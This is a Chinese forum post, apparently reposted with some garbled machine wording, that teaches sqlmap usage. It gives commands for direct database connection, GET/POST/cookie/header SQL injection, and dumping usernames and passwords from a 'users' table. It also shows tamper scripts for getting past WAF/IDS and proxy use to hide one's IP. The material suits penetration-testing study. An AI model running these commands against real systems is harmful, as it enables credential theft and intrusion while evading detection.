IT评测·应用市场-qidao123.com

标题: sqlmap确定目标/实操 [打印本页]

作者: 惊落一身雪    时间: 2024-7-31 13:40
标题: sqlmap确定目标/实操
安装kali,kali自带sqlmap,在window系统中跟linux系统操作有区别
   sqlmap是一款主动化SQL工具,打开kali终端,输入sqlmap,出现以下界面,就阐明sqlmap可用。
   

   sqlmap确定目标

   一、sqlmap直连数据库

   1、直连数据库得到旗标
   sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner
   阐明:
   
   2、直连数据库获取用户及权限
   sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner -users
   二、sqlmap实操

   1、sqlmap完整的get注入

           sqlmap直接对单一的url探测,参数使用-u大概--url
   
           sqlmap -u 'http://xx/?id=1'
   
           sqlmap -u 'http://xx/?id=1' --dbs --batch
   
           sqlmap -u 'http://xx/?id=1' --current -db --batch
   
           sqlmap -u 'http://xx/?id=1' -D 'security' --tables --batch
   
           sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns --batch
   
           sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump --batch
   
           sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username,password' --dump --batch
   2、参数阐明

   指定命据库/表/字段
   
   如:sqlmap -u 'http://xx/?id=1'  -D  'security'  -T  'users'  -C  'username' --dump
   2、post哀求

   sqlmap探测post盲注
   步调一:获取http哀求天生test.txt文件
   步调二:使用基于时间技术的sqlmap探测-r
   如:sqlmap -r test.txt --technique T -p uname
   检测post哀求的注入点,使用BP等工具抓包,将http哀求内容保存到txt文件中。
   -r 指定需要检测的文件,SQLmap会通过post哀求方式检测目标。
   如:sqlmap -r test.txt
   3、cookie注入

   --cookie 指定cookie的值,单/双引号包裹。
   如:sqlmap -u "http://xx?id=x" --cookie 'cookie'
   4、sqlmap举行http头注入

   指定注入位置举行注入,在保存的文件中,对于参数的修改为*,保存在txt文档中
   再举行sqlmap -r /root/test.txt
   5、sqlmap tamper脚本注入

   --tamper 指定绕过脚本,绕过WAF或ids等。
   sqlmap内置了很多绕过脚本,在 /usr/share/sqlmap/tamper/ 目录下
   如:sqlmap -u 'http://xx/?id=1' --tamper 'uppercase.py'
   三、sqlmap其他参数

   (1)常见参数

   
   (2)性能优化参数

   
   (3)等级参数

   
   (4)署理参数

   潜伏自己的真实ip
   
   
   

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/) Powered by Discuz! X3.4